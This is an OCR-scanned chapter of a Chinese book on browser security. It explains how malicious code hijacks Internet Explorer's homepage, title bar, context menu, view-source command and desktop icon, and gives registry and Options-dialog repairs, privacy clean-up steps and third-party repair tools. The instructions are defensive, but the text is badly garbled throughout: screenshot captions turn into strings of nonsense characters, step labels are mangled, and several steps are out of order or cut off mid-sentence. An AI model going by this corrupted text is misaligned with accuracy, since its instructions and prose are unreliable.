始 检测 电脑 系统 。 


[sep 图 在 安装 《恶意 软件 查 杀 助 理 》 的 同 
时 ， 还 要 安装 一 个 恶意 软件 查 杀 工 具 。 运 行 
恶意 软件 查 杀 工具 ， 主 界面 如 下 图 所 示 。 


Pre 于 有 39 和 全 下 吕 BHERO， 
Ei rs 
#8 S00 


2 
i 


3 C A 


Re 


ET 


2MD ss 
bt 


bt 


EE 


step 园 单 去 “系统 扫描 ”按钮 ， 软 件 开 始 对 
电脑 系统 进行 扫描 ， 并 实时 显示 扫描 过 程 。 


侈 提示 :“ 系 统 扫 描 ” 完 成 后 ， 用 户 可 以 
根据 软件 提示 的 结果 进行 进一步 的 清除 操 
作 。 因 此 ， 一 定 要 记得 经 常 对 电脑 系统 进 
行 系统 扫描 。 


11.4 常见 网 页 浏览 器 的 攻击 
方式 
网 页 浏览 器 是 用 户 访问 网 站 的 主要 工 
具 。 通 过 网 页 浏览 器 ， 用 户 可 以 访问 海量 


的 信息 。 本 节 就 以 常用 的 正 浏览 器 为 例 ， 
来 介绍 常见 网 页 浏览 器 的 攻击 方法 。 


11.4.1 修改 默认 主页 


某 些 网 站 为 了 提高 自己 的 访问 量 和 做 
广告 宣传 ， 就 使 用 恶意 代码 ， 将 用 户 设置 
的 主页 修改 为 自己 的 网 页 。 解 决 这 一 问题 
最 简单 的 方法 是 在 “Internet 选 项 ”对 话 框 
中 进行 设置 ， 具 体 的 操作 步骤 如 下 。 
打开 IE 浏览 器 ， 在 其 中 选择 “ 工 
具 ” 一 “Internet 选 项 ”菜单 项 。 


加 EPE 
打开 “Internet 选 项 ”对 话 框 ， 在 其 中 
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step 图 在 “主页 ”设置 区 域 中 的 “地 址 ” 文 
本 框 中 输入 自己 需要 的 主页 ， 如 这 里 输入 
百度 的 网 址 为 http://www.baidu.com/。 


二 

a 

a 
Ce Ww | 


[ep 国 单 去 “确定 ”按钮 ， 这 样 就 可 以 把 
主页 设置 为 百度 。 双 击 桌 面 上 的 “IE 浏览 
器 ”图 标 ， 即 可 打开 IE 浏览 器 主页 ， 即 百 
度 首页 。 


本 ep 
x 所 共 S8 


11.4.2 ”恶意 更 改 浏览 器 标题 栏 


网 页 浏览 器 的 标题 栏 也 是 黑客 攻击 浏 各 
览 器 常用 的 方法 之 一 ， 具 体 表现 为 浏览 器 
的 标题 栏 被 加 入 一 些 固 定 不 变 的 广告 等 信 
息 。 针 对 这 种 攻击 方法 ， 用 户 可 以 通过 修 
改 注 册 表 来 清除 标题 栏 中 的 广告 等 信息 ， 
有 具体 的 操作 步骤 如 下 。 


step 国 打开 “运行 ”对 话 框 ， 在 “打开 ” 文 
本 框 中 输入 regedit 命 令 。 
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step 图 单 去“ 确定 ”按钮 ， 即 可 打开 “注册 
表 编 辑 器 ”窗口 。 
EE ox 
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step 园 随即 打开 “确认 数值 删除 ”对 话 框 ， 
提示 用 户 “ 确 实 要 永久 删除 此 数值 吗 ? ”。 


全 条 除 肥 此 注册 雪 值 会 引起 系统 不 格 定 。 确 实 要 永久 删除 此 数值 吗 ? 
Ey 
step 图 单 去 “是 ”按钮 ， 即 可 完成 数值 删除 操 


作 ， 关 闭 “ 注 册 表 编辑 器 ”， 然 后 重新 启动 计 
算 机 。 当 再 次 使 用 正 浏览 器 浏览 网 页 时 ， 就 会 
发 现 标题 栏 中 的 广告 等 信息 已 经 被 删除 了 。 


0 四 
< Cnn ”Bs 
az a hoi pe mn wr ss ar EE 
90 
O00. 
Bai 人 百度 
| ss 
i 
i 
. Ee ， 


11.4.3 ”强行 修改 网 页 浏览 器 的 右键 菜单 


被 强行 修改 了 右键 菜单 的 现象 主要 表 
现在 : 
。 右键 快捷 菜单 被 添加 非法 网 站 链接 ; 
。 右键 弹出 快捷 菜单 功能 被 禁用 ， 在 
焉 浏览 器 中 单 击 鼠 标 右键 无 反应 。 
针对 浏览 器 右键 菜单 中 出 现 的 非法 链 
接 这 种 情况 ， 修 复 的 具体 操作 步骤 如 下 。 


step 回 在 右 侧 窗 格 中 选中 “Windows Tile” 
选项 值 项 并 右 击 ， 在 弹出 的 快捷 菜单 中 选 
择 “ 删 除 ” 菜 单项 。 


< 5 
tee LOCAL MACHINES OPARE ino oR reermet Erpleren Man 
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[ep 加 打开 “注册 表 编 辑 器 ”窗口 ， 在 
左 侧 窗 格 中 单 击 展 开 HKEY_ CURRENT_ 
USER\Software\Microsoft\Internet Explorer\ 
MenuExt。 


EE a 
到 WD NEG Sz 


EY CURRENT USERSofware irocof ternet ErplorenMenuEe 


[step 图 IE 的 右键 菜单 都 在 这 里 设置 ， 在 其 中 
选择 非法 的 右键 链接 ， 如 这 里 选择 “追加 
到 现 有 的 PDF” 选 项 并 右 击 ， 在 弹出 的 快捷 
菜单 中 选择 “删除 ”菜单 项 。 


[ 
HD Re) 下 本 Ms 和 人 
EE 地 
EL REG_SZ 
Conterts REG_ DWORD. 
BB MAO Senir ea 
~ MenuEnt 
ms 
症 fs RD) 
A RS 
ine | | 
[HN HKEY CURRENT_USER\Sofware\Micr ocofi\ niomet Explorer\MenuExr EI SERRE POF 


[Bee 图 打开 “确认 项 删除 ”对 话 框 ， 提 示 
用 户 是 否 确实 要 永久 删除 这 个 项 和 所 有 其 
子 项 。 


确认 项 出 除 


全 确实 要 订 久 了 这 个 项 和 所 有 其 于 项 吧 ? 
Cae a 
单 击 “ 是 ”按钮 ， 即 可 将 该 项 删除 。 


CR oO x 
HD RE) EB WA 0 
入 VotoryJourmalCerticete ES 地 
下 oorooe nh ec 
钢 Conterts REG_DWoRD 
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Restrictions。 


RegisteredApplications 
© Regisvy workshop 
Remorelyanyhere 
B nso | 
局 ceamingceice “| 


HIKEY CURRENT_USER Sfware Polioes\Mieresofl rternet Explorer\Restrictions 


step 图 在 右 侧 窗 格 中 选中 “NoBrowser 
ContextMenu” 选 项 并 右 击 ， 在 弹出 的 快捷 
菜单 中 选择 “修改 ”菜单 项 。 


(Restek 
RegisteredAppications 
Regietry Workshop, 


< » le 
HKEY.CURRENT.USER Sofwore\Polices\Micresoftl irternet Eaplorer Restrictions 


step 图 打开 “编辑 字符 串 ” 对 话 框 ， 在 


ee “数值 数据 ”文本 框 中 输入 00000000， 
间 Main vy > 四 
a 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 IE 浏 览 器 的 
ne 修复 。 
总 六 为 Adobe PDF 
Sa. < 
全 ET Er Adobe POF 数值 饼 称 (N): 
| NoBrowserContextMenu 
侈 提示 :在 删除 前 ， 最 好 先 展开 MenuExt ai 


主键 检查 一 下 ， 里 面 是 否 会 有 一 个 子 键 ， 
其 内 容 是 指向 一 个 HTML 文 件 的， 找到 这 个 
文件 路 径 ， 然 后 根据 此 路 径 将 该 文件 也 删 
除 ， 这 样 才能 彻底 清除 。 

针对 右键 菜单 打 不 开 的 情况 ， 下 面 介 
绍 其 修复 的 操作 步 又。 
step 车 打开 “注册 表 编 辑 器 ”窗口 ， 在 左 侧 
窗 格 中 单 击 展开 HKEY _CURRENT _USER\ 
Software\Policies\Microsoft\Internet Explorer\ 


11.4.4 ”禁用 网 页 浏览 器 的 “ 源 ”菜单 
命令 
一 般 网 页 浏览 器 都 为 用 户 提 供 查看 
网 页 源 文件 的 菜单 命令 ， 即 “ 源 ” 菜 单 命 
令 ， 该 菜单 常常 受到 黑客 的 攻击 ， 有 具体 表 
现 为 被 禁用 。 
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出 现 这 种 现象 的 原因 是 恶意 代码 修 
改 了 注册 表 的 键 值 ， 具 体位 置 为 HKEY _ 
CURRENT_USER\Software\Policies\Microsoft\ 
Intemet Explorer 下 ， 建 立 子 键 “Restrictions”， 
然后 在 “Restrictions ”下 面 建立 一 个 
DWORD 值 NoViewSource， 且 将 DWORD 值 
赋值 为 “1”。 


Cte) 


CJ] 


Er CURRE TT Elore\Restictiom 

另外 一 个 位 置 为 HKEY_USERS\.DE- 
FAULT\Software\Policies\Microsoft\Internet 
Explorer\Restrictions 下 ， 将 DWORD 值 


NoViewSource 的 键 值 改 为 “1”。 


通过 上 面 这 些 键 值 的 修改 就 可 以 达到 
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使 “查看 ”菜单 下 中 的 “ 源 文件 ”被 禁用 
的 目的 。 

在 明白 问题 的 所 在 之 后 ， 就 可 以 通过 
以 下 方法 进行 修复 。 
[Sep 图 打开 记事 本 文件 ， 在 其 中 输入 以 下 


内 容 。 


Windows Registry Editor Version 5.00 
[HKEY _ CURRENT USER\Software\ 
Policies\Microsoft\Internet Explorer\ 
Restrictions] 
“NoViewSource” =dword:00000000 
[HKEY _ USERS\.DEFAULT\Software\ 
Policies\Microsoft\Internet Explorer\ 
Restrictions] 
“NoViewSource” =dword:00000000 


二- 3 o x 


crosost\Internet Hplorer\Restrictions] 


Mi crosott\aternet Esplerer\Restrictions] 


step 图 选择 “文件 ”一 “另存 为 ”菜单 项 


o 


s+ o x 
| 二 机 | wa mrio sev wom 
sn ten 
i Pe recatt\etorpet Eplerorn tions] 
GS) al ocort\Internat Kaplorer\Restrictions] 
Fast 
oP 人 


[Sep 图 打开 “另存 为 ”对 话 框 ， 在“ 文 
件 名 ”文本 框 中 输入 文件 名 ， 这 里 输入 
unlock.reg。 


加 个 .ia > x v5 | 村 站 


an- 


step 国 单 击 “ 保 存 ” 按 钮 ， 
注册 表 的 形式 保存 。 
图 | 回 轴 > 二 店主 地 工 起。 文 拉 一 D x 


JE 国 := := ss = @ 


< ~ 个 四 ,Wwe xs vo a7 EE 


即 可 将 该 文件 以 


才 全 
人 OneDrive 
ET 

国 Desktop 

国 in 

豆 男 H 

目 z 

TT 

和 

i Wirdows10 cl 
= Sa DY 
= 


中] EasyBCD Badup (2015-11-08}bcd 
避 jcoa 
癌 wmiockvee 


- [a ve 
30 个 项 目 这 中 1 个 项 目 267 字 主 图 中 


[Eee 图 将 该 文件 导入 到 注册 表 中 ， 无 须 重 
新 启动 计算 机 ， 这 时 只 要 重新 运行 IE 浏览 
器 ， 就 会 发 现 IE 的 “ 源 ”菜单 项 已 恢复 
使 用 。 


区 而 " 国 " bP | 园 gE- 下 ,9 和 痢 委 
x st) EE ra In wu 
x 人 8 ~ 


Mk (7) (100%) 了 09 
mF » 百度 
me ， 


st) » 
BAY 已 


< 


11.4.5 ”强行 修改 浏览 器 的 首页 按钮 


IE 浏 览 器 默认 的 首页 变 成 灰色 且 按 
钮 不 可 用 ， 主 要 是 由 于 注册 表 HKEY_US- 
ERS\.DEFAULT\Software\Policies\Micro- 
soft\Internet Explorer\Control Panel 下 的 Word 
值 homepage 的 键 值 被 修改 了 ， 即 原来 的 键 
值 为 “0”， 被 修改 为 “1”。 

针对 这 种 情况 用 户 可 以 采用 下 列 方法 

进行 修复 。 
[stes 国 打开 “注册 表 编辑 器 ”窗口 ， 在 左 侧 
窗 格 中 单 击 展 开 HKEY USERS\DEFAULT\ 
Software\Policies\Microsoft\Internet Explorer\ 
Control Panel 项 。 
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ron 


rm SR PTAA Tsolmre ocr Minomhn Nem mer Erp or coool Porel | 


在 右 侧 窗 格 中 选择 homepage 选 项 并 右 
击 ， 在 弹出 的 快捷 菜单 中 选择 “修改 ” 菜 
单项 。 


EE = 汪汪 
RN ME EE) eA) WH 
(meeerd byen 


ee 


i “编辑 字符 串 ” 对 话 框 ， 在 “ 数 
值 数据 ”文本 框 中 将 数值 1 修改 为 0。 


国 单 击 “确定 ”按钮 ， 重 新 启动 计算 机 
ty 


ENHKEY USERS\ DEFAULT\Sofware\Poices icrosctn\ nternet Explore Centrol Pane| 
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si 11.4.6 ”删除 桌面 上 的 浏览 器 图 标 


l 当 桌 面 上 的 IE 浏览 器 图 标 “ 不 见 
了 ， 出 现 这 种 现象 的 主要 原因 还 是 流氓 软 
件 的 自 改 所 致 ， 或 计算 机 中 了 病毒 ， 这 时 
建议 用 户 使 用 杀毒 软件 查 杀 病 毒 ， 然 后 重 
新 启动 计算 机 。 不 过 ， 还 可 以 通过 手动 建 
立 快捷 方式 来 使 图 标 出 现在 桌面 上 。 

通过 手工 建立 IE 快捷 方式 的 具体 操作 
步骤 如 下 。 
[step 图 双击 桌面 上 的 “此 电脑 ”图 标 ， 打 开 
“此 电脑 ”窗口 。 


黑 ! 回 帅 > | k 电 肪 = xX 
计算 机 。 豆 看 © 
个 国 ， i ， vo | a 有 
加 ev ”~ 文件 直人 加 
国 besltci 
ee 了 
辆 图片 
国 交 杭 需 
国 
省 本 未 
ts EE* 
本 地 磁盘 (0D;) 
和 (E) 9 2 
本 地 碚 盘 (F) 
大 CD 驱动 里 |G) Mobile Partner T 莹 
本 地 陪 鳃 (Hi v 
12 个 项 目 图 
step 国 在 其 中 打开 Program Files 一 Internet 
Explorer 文 件 夹 。 
韦 阿 便 记 工具 。 Internet Explorer 口 x 
旺 


位 人 项 目 “ 违 h1 个 项 E 805 KB 司 四 


[step 图 选择 iexplore.exe 图 标 并 右 击 ， 在 弹出 
的 快捷 菜单 中 选择 “发 送 到 ”一 “桌面 快 
捷 方式 ”菜单 项 ， 这 样 就 可 以 将 IE 快捷 方 
式 放松 到 桌面 上 使 用 。 
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另外 ， 还 可 以 在 注册 表 中 修复 IE 浏览 
器 图 标 “ 不 见 ” 的 情况 ， 具 体 的 操作 步骤 
如 下 。 
[ep 加 打开 “注册 表 编 辑 器 ”窗口 ， 在 
左 侧 窗 格 中 单 击 展开 HKEY_CURRENT_ 
USER\Software\Microsoft\Windows\ 
CurrentVersion\Explorer\HideDesktopIcons\ 
NewStartPanel 项 。 


FE 


下 weonpoma “le » 
eatEY CURRENT LSE Ms ofnore Moot Winoow currencYervor Explorer\pi deDosiaopicons Newstortou nel 


[step 园 在 右 侧 的 窗 格 中 选择 “871C5380- 
42A0-1069-A2EA-08002B30309D” 键 值 
项 并 右 击 ， 在 弹出 的 快捷 菜单 中 选择 “ 修 
改 ” 菜 单项 。 
E00 一 口 
六 件 (站 乱 久 日 二 看 V) 3A】 和 的 (H) 


类型 
REG cd 
REG_D 
。 REG Di 
REG pt 
REG Di 


step 图 打开 “编辑 DWORD (32 位 ) 值 ” 对 
话 框 ， 在 “数值 数据 ”文本 框 中 输入 0。 


step 四 单 去“ 确定 ”按钮 ， 然 后 刷新 桌面 ， 
即 可 看 到 消失 的 JE 图 标 重 新 出 现 ， 且 右键 
菜单 也 可 用 。 


编 可 DWORD (32 们 看 X 


ERRN): 
[871C5380-42A0-1069-AZEA-06002830303D} 


ew rr 
加 Ee 
11.5 ”网 页 浏览 器 的 自我 防护 


技巧 


为 保护 计算 机 的 安全 ， 在 上 网 浏览 网 
页 时 需要 注意 对 网 页 浏览 器 的 安全 维护 ， 
一 般 情况 下 ， 网 页 浏览 器 其 自身 均 有 防护 
功能 ， 这 里 以 最 常用 的 IE 浏览 器 为 例 ， 来 
介绍 网 页 浏览 器 的 自身 防护 技巧 。 


11.5.1 ”提高 I|E 的 安全 防护 等 级 


通过 设置 IE 浏 览 器 的 安全 等 级 ， 可 以 
防止 用 户 打开 含有 病毒 和 木马 程序 的 网 
页 ， 这 样 可 以 保护 系统 和 计算 机 的 安全 。 

下 面 介绍 设置 IE 安 全 等 级 的 具体 操作 
步骤 。 

在 IE 浏览 器 中 选择 “工具 ”一 
“Internet 选 项 ”命令 ， 打 开 “Internet 选 
项 ”对 话 框 。 


[二 


Re 


厅 ”==eazfeFa sam5a eg 
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[step 图 选择 “安全 ”选项 卡 ， 进 入 “安全 ” 
设置 界面 。 


mE 


3 


和 S$ Vv 5 


© 
BE en i 
manet 。 语 商 


@ cesss mers reserss 
ET 


Ce ™ 
选中 Internet 图 标 ， 单 击 “ 自 定义 级 
别 ” 按 钮 ， 打 开 “ 安 全 设置 -Internet 区 域 ” 
对 话 框 。 


Step 加 单 去“ 重 置 为 ”下 拉 按 钮 ， 在 弹出 的 
下 拉 列 表 中 选择 “高 ”选项 。 


Er 
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step 园 单 去 “确定 ”按钮 ， 即 可 将 IE 安全 等 
级 设置 为 “高 ”。 


enet Expiorer to) 


此 浏览 器 的 表单 功能 在 一 定 程度 上 方便 了 

用 户 ， 但 也 常 被 黑客 用 来 窃取 用 户 的 数据 信 
息 ， 所 以 从 安全 角度 出 发 ， 需 要 清除 浏览 器 
的 表单 并 取消 自动 记录 表单 的 功能 。 

清除 IE 浏 览 器 中 的 表单 的 具体 操作 

步骤 如 下 。 
在 IE 浏览 器 中 选择 “工具 ”一 
“Internet 选 项 ”命令 ， 打 开 “Internet 选 
项 ”对 话 框 ， 并 选择 “内 容 ” 选 项 卡 。 


rire ER 


-eee 


EE 
sat 
3 Are a 
Er 


Ee] Es) 


em, 


FETE ee 


> EE 
ED pppoe teers 
3 


step 较 在 “自动 完成 ”选项 区 域 中 单 击 “ 设 
置 ” 按 钮 ， 打开“ 自动 完成 设置 ”对 话 
框 ， 取消 对 所 有 的 复 选 框 的 匀 选 。 
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于 x 


“县 动 守 成 ' 会 列 出 与 以 前 乱入 或 访问 的 科目 可 能 区 配 的 内 容 . 


口 于 单 上 的 用 户 名 和 密码 PP) 


EM 
攻守 成 历 史记 录 (D).. 
一 


[es 图 单 去 “删除 自动 完成 历史 记录 ” 按 
钮 ， 打 开 “ 删 除 浏览 历史 记录 ”对 话 框 ， 
勾 选 “ 表 单数 据 ” 复 选 框 。 


0 


全 狼藉 网 站 天 (RN 
保 医 Cooke 和 Inicrmnet 文件 ,以便 你 履 大 的 网 站 衣 够 避风 这 迁 项 并 
EC 


万 Internet 文件 和 了 网 文件 CD 
故居 和 避风 只、 于 从 NRFED 芭 三 


Dcookie 和 网 站 了 (Oo) 
内 站 为 了 你 入村 大 于 必要 网 站 性 站 而 和 入 三 作证 其 机 上 的 文件 入 下 
二 


历史 记录 (HT) 
iW 


口 向 本 护 、-ActiveX 次 " 科 "请 甸 中 慰 " 数 基 (9 
从 芝 还 条 网站， 时 后生 扩 用 来 窒 XI 可 堵 全 和 体 处 忆 汉 共享 人 的 从 
本 玉昌 的 各所 以 请 加 叶 队 - 调 示 的 全 /从 到 天- 


IDl 


step 国 单 去 “删除 ”按钮 ， 即 可 删除 浏览 器 
中 的 表单 信息 。 


11.5.3 ”清除 浏览 器 的 上 网 历史 记录 


Windows 操 作 系统 具有 历史 记录 功能 ， 
可 以 将 用 户 以 前 所 运行 过 的 程序 、 浏 览 过 
的 网 站 、 查 找 过 的 内 容 等 记录 下 来 ， 但 这 
同样 会 泄露 用 户 的 信息 。 可 以 通过 如 下 方 
法 来 对 这 些 信息 进行 清除 。 

方法 1: 通过 在 “Internet 选项 ”对 话 
框 的 “常规 ”选项 卡 下 ， 勾 选 “ 浏 览 历史 


记录 ”区 域 中 的 “退出 时 删除 浏览 历史 
记录 ” 复 选 框 ， 即 可 实现 清除 浏览 过 的 IE 
网 址 。 
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方法 2: 利用 注册 表 进 行 清除 。IE 历 史 
记录 在 “注册 表 编 辑 器 ”中 的 保存 位 置 是 
HKEY CURRENT_USER\Software\Micro- 
soft\Internet ExplorerTypedURLs， 因 此 ， 只 
要 删除 该 子 项 下 的 所 有 内 容 即 可 。 


法 村 去 信 由 = DX 
站， 人 直下 M 笋 本 A) ED 
国 prva 


HINHKEY_CURRENTLUSERNSofwareMicrosofntermet Explorer\TypedURLs 


人 提示 :在 输入 网 址 时 按 Ctrl+O 组 合 键 ， 
在 弹出 的 “打开 ”对 话 框 中 输入 要 访问 的 
网 站 名 称 或 PP 地 址 ， 输 入 的 地 址 链接 URL 就 
不 会 保存 在 地 址 栏 里 了 。 


11.5.4 删除 Cookie 信 息 


Cookie 是 Web 服 务 器 发 送 到 计算 机 中 的 
数据 文件 ， 它 记录 了 用 户 名 、 口 令 及 其 他 
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一 些 信息 。 特 别 目前 在 许多 网 站 中 ，Cookie 
文件 中 的 Usemame 和 Password 是 不 加 密 的 明 
文 信息 ， 就 更 容易 泄露 。 因 此 ， 在 离开 时 
删除 Cookie 内 容 是 非常 必要 的 。 

用 户 可 以 通过 “Internet 选 项 ”对 话 框 
中 的 相关 功能 实现 删除 Cookie， 具 体 的 操作 
步骤 如 下 。 
Estee 回 打开 “Internet 选 项 ”对 话 框 ， 选 择 
“常规 ”选项 卡 ， 在 “浏览 历史 记录 ” 选 
项 区 域 中 单 击 “ 删 除 ” 按 钮 。 


naman 1 


有 


佛 


打开 “删除 浏览 历史 记录 ”对 话 框 ， 
在 其 中 匀 选 “Cookie 和 网 站 数据 ” 复 选 框 ， 
单 击 “ 删 除 ”按钮 ， 即 可 清除 IE 浏览 器 中 
的 Cookie 文 件 。 


DR 
便于 Cookie 和 |mermet 村 文人 以 人 人 要 于 的 网 起 芝 人 人 存 病 过 人类 
和 过 


口 本 intemnet 妇 析 和 同文 件 (TD 
过 站 而 的 河 下 ， 匡 全 44 二 本 


HD cookle RO) 
同 站 为 了 保 闻 革 灾 页 或 臣 共 网 引 必 5 和 竺 全 计 择机 上 弘文 件 基数 
到 本 
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11.6 ”使 用 其 他 工具 保护 网 页 浏 
览 器 的 安全 


除了 可 以 利用 浏览 器 自身 的 防护 功能 
来 保护 其 安全 外 ， 用 户 还 可 以 借助 第 三 方 
软件 来 保护 网 页 浏览 器 的 安全 。 


使 用 《IE 修 复 专 家 》 


l 使 用 《IE 修 复 专家 》 可 以 修复 IE 的 标 
题 栏 、 首 页 、 右 键 菜 单 、 工 具 栏 按钮 、 工 
具 栏 菜单 、 附 加 工具 栏 、Outlook 标 题 等 ; 
还 可 以 全 面 修复 各 项 Internet 选 项 ， 包 括 常 
规 、 安 全 、 连 接 、 内 容 、 高 级 等 所 有 选项 
设置 ， 并 提供 “一 键 修 复 ” 功 能 ， 单 击 其 
即 可 自动 修复 所 有 设置 。 
使 用 《IE 修 复 专家 》 修 复 IE 浏 览 器 的 

具体 操作 步骤 如 下 。 
[sep 贺 下 载 并 安装 《IE 修复 专家 》 后 ， 打 开 
“IE 修复 专家 ” 主 窗口 ， 在 其 中 选择 “ 常 
规 设 置 ” 选 项 ， 进 入 “常规 设置 ”界面 ， 
在 其 中 根据 提示 输入 相应 的 内 容 。 


尽 11.6.1 


您 市 各 3 且说 各 作 复 
通信 EE | 当前 IE 首页 | 四 http://wrv-batdu con/ J| 


ER 1 刁 [下 
Err Yd 
| 


Y 
es 常规 桥 复 
| 三 沽 除 记 动 叶 凑 出 的 警官 品 
多 站 太 锁定 za 六 此 名 窗口 的 大 小 和 位 置 [zd] 
(公民 入 全 万 开机 时 自动 过 入 IE 修 蓝 专 灾 
[ET - 
和 | [2 [进出 


step 图 单 去 “常规 修复 ”按钮 ， 即 可 对 IE 浏 
览 器 进行 常规 修复 。 
IE 修复 专家 x 


06 已 成 功 修复 以 上 名 项 没 置 ! 
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step 图 在 “常规 设置 ”界面 中 的 “选项 ” 设 
置 区 域 中 ， 用 户 还 可 以 根据 需要 勾 选 相应 


区 三 生 | rm en co 习 EW 
公信 JIE 承认 页 局 刁 [区 
TTT Ea 
I 可 攻 共 
席 规 修复 
选项 

GEEEEEETTEEET 

友 锁定 IE 浏览 箭 窗 品 的 大 小 和 位 置 [wn] 

开机 时 白 动 还 行 1F 馆 虽 志 未 


全 面 修复 


单 击 “ 全 面 修复 ”按钮 ， 打开“ 全 面 
修复 -修复 选项 设置 ”窗口 ， 在 其 中 匀 选 相 
应 的 修复 选项 。 


BE 修复 专家 5. 21 


单 击 “ 立 即 修复 ” 按 钮 ， 即 可 开始 对 
IE 浏览 器 进行 全 面 修复 。 修 复 完毕 后 ， 弹 出 
“修复 成 功 ”对 话 框 ， 单 击 “ 确 定 ” 按 钮 。 


修复 成 功 ! X 


06 已 或 功 修复 您 的 |E 汶 上 器 


11.6.2 ”使 用 《IE 修复 免疫 专家 》 


《IE 修复 免疫 专家 》 可 以 修复 被 算 改 
的 Internet Explorer 浏 览 器 的 标题 、Outlook 


标题 、Windows 启 动 时 自动 运行 的 网 址 、 
Windows 系 统 设 置 及 主页 地 址 等 。 

使 用 “IE 修复 免疫 专家 ”修复 IE 浏览 
器 的 具体 操作 步骤 如 下 。 


第 1 步 : 对 IE 插 件 进行 免疫 


[step 图 下 载 并 安装 《IE 修复 免疫 专家 》 后 ， 
双击 桌面 上 的 “IE 修复 免疫 专家 ”快捷 图 
标 ， 即 可 打开 “JE 修复 免疫 专家 ” 主 窗口 。 


妇 


部 | 外 EL 


|| | 


第 11 章 ”网 页 


step 图 单 击 “开始 免疫 ”按钮 ， 即 可 对 所 选 
的 本 插件 进行 免疫 处 理 。 免 疫 成 功 后 ， 弹 
出 一 个 信息 提示 框 ， 提 示 用 户 免 疫 成 功 。 


EE 


ERT ET 


RE 


a 


mIRe 


证 红 入 


已 | 者 | 受 nb | 


单 击 “JE 插件 免疫 ”按钮 ， 进 入 “IE 
插件 免疫 ”界面 。 


ys. le 
| 


— ot 


on 

EW 促 亲 抽 褒 加 ] 

口 生 7 各 ‘Dene 三 -re 号 
er 


[3 
[ul 


0 
esa 
需 伯 各 矿 [ 


了 
i 


加 RH3 夺 | [ws mm 区 a EE ET) 
到 | 到 | 柄 | 出 


step 图 在 “IE 插件 免疫 设置 ”列表 框 中 勾 选 
需要 免疫 的 插件 ， 或 单 击 “ 全 选 ” 按 钮 ， 
将 所 有 的 IE 插件 选中 。 


Jismofg [ 


| 2. 


| 加 | 加 


如 上 | 
tb 情 件 TE 
He | 


一 Ea 


HH 


SA) es 


EETIIE TE 


EF 


名 


第 2 步 : 进行 IE 安 全 设置 


step 加 在 “IE 修复 免疫 专家 ”窗口 中 单 击 “ 正 
安全 设置 ”按钮 ， 打 开 “ 木 马 分 析 专家 〈 修 
复 IE 属 性 和 菜单 设置 ) ”对 话 框 ， 在 “党 
规 ” 选 项 卡 的 “JE 属性 设置 ”区 域 中 ， 用 户 
可 以 根据 实际 需要 对 常规 选项 进行 设置 。 


常规 安全 | 内 EF | 连 类 程序 | 高 级 | 
2 -Hay 
IE 工交 用 更 交 |6 文 伯 的 网。 居民 果 | 

区 
并 
和 开放 拓 生 aa 毕 aa 
文件 查看 | 收成 } 工具 于 助 | 其它 | 
纺 一 师 : 姜 " 辣 

厂 茜 用 “打开 ” 

人 | 
攻 。 刻 雪 用 另 枉 为 “Web 全 部 多 
座 厂 茜 用 关闭 刘 监 器 
和 人 设置 | 


[step 图 选择 “安全 ”选项 卡 ， 在 打开 的 界面 
中 用 户 可 以 根据 实际 需要 对 IE 属 性 的 安全 
选项 进行 设置 。 


常规 | 实 全 “内 内 | 连作 程序 高 级 | 


[es 本 IE: 人 
站 从 直 1] 中 能 再 
IE 厂 禁止 便 用 【文件 下 载 2] 功能 
厂 禁止 使用 【字体 下载 】 功 能 
厂 禁止 信用 【Jars 答 序 】 材 本 息 


芋 | 


x 件 ”查看 ; 中 芝 | 工具 部 助 | 其 它 | 


文件 
厂 扫 用 “新 尘 ” 调 品 
纺 厂 元 用 “打开 " 
亚 
重 
这 


厂 林 用 “另存 为 ~ Be 
三 禁用 另存 为 “yehJ, 全 部 ” 急 
厂 禁用 关闭 刘 览 器 
公设 和 
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step 图 选择 “内 容 ” 选 项 卡 ， 在 打开 的 界面 ”中 用 户 可 以 根据 实际 需要 对 IE 属 性 的 高 级 


中 用 户 可 以 根据 实际 需要 对 IE 属 性 的 内 容 ”选项 进行 设置 。 


选项 进行 设置 。 


Pe | 


LE 


厂 茜 用 关闭 刘 览 器 


3 厂 茜 用 和 有 有 为 “Web 页 ,全 人 


[Se 加 选择 “连接 ”选项 卡 ， 在 打开 的 界面 区 域 中 ， 用 户 可 以 根据 实际 需要 对 IE 菜单 


中 用 户 可 以 根据 实际 需要 对 IE 属性 的 连接 ”的 文件 选项 进行 设置 


选项 进行 设置 。 

常规 | 安全 | 内 容 | 连接 程序 高 级 | 
[ 

三 村 用 作 丰 自动 代理 亲本 

忆 其 用 更 改 局 域 风 : 滑 Bm 
亚 下 各 有 te 人 旭光 过 楼 同时 
和 
重 | 


文件 查看 | 收藏 工具 | 可 助 其 它 | 
聊 “0 

三 禁用 “打开 
eh E22 
EI 
年 "的 8 和 XN 


Lt 


Step 图 选择 “查看 ”选项 卡 ， 在 打开 的 界面 
中 用 户 可 以 根据 实际 需要 对 IE 菜单 的 查看 


[Eee 国 选择 “程序 ”选项 卡 ， 在 打开 的 界面 选项 进行 设置 。 


中 用 户 可 以 根据 实际 需要 对 IE 属性 的 程序 


选项 进行 设置 。 


常规 | 安全 | 内 容 | 这 接 | 程序 高 级 上 


二 。 三 天目 惠 改 邮件 设置 
厂 楚 用 “ 重 时 qt 设置 ” 功能 

| 

| 文件 查看 | 收藏 | 工具 ;帮助 其它] 

人 5 

I 半音 半 条 

六 玉林 用 中 为 “rc 全 部 ” 

卜 PM CE 


218 


党 规 | 安全 | 内 容 | 连接 | 程序 | 高 级 
3 六 禁止 策 用 1 五 高 级 项 
友 禁 月 更 改 高 级 页 设置 
厂 禁止 用 户 使 用 标示 
下 


2 


文件 | 要 看 | 收藏 | 工具 | 帮助 | 其 它 | 


环 厂 执 让 XT 具 栏 3 
"RIAN 。 抱 ， 
并 到 于 | 


step 图 选择 “收藏 ”选项 卡 ， 在 打开 的 界面 
中 用 户 可 以 根据 实际 需要 对 IE 菜单 的 收藏 


[Eee 图 选择 “高 级 ”选项 卡 ， 在 打开 的 界面 ”选项 进行 设置 。 


常规 | 安全 | 内 容 | 连接 | 程序 | 高 汲 
[3 克 禁止 二 用 I 高 汲 项 
.Se 


jl 
a 


厂 禁用 添加 脱 机 页 计划 
厂 禁用 山谷 脱 机 页 计划 


于] 
S| 
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实 全 | 内 容 | 连接 
禁止 址 用工 焉 高 级 项 
做 用 更改 高 张 页 疫 竺 
整 使 用 标示 


程序 | 高 级 


| 


二 
dl 


凌 || mEsana 嘱 ) 器 


查看 | 收藏 | 工具 | 帮助 | 其 它 


选择 “工具 ”选项 卡 ， 在 打开 的 界面 


中 用 户 可 以 根据 实际 需要 对 JE 菜单 的 工具 


选项 进行 设置 。 


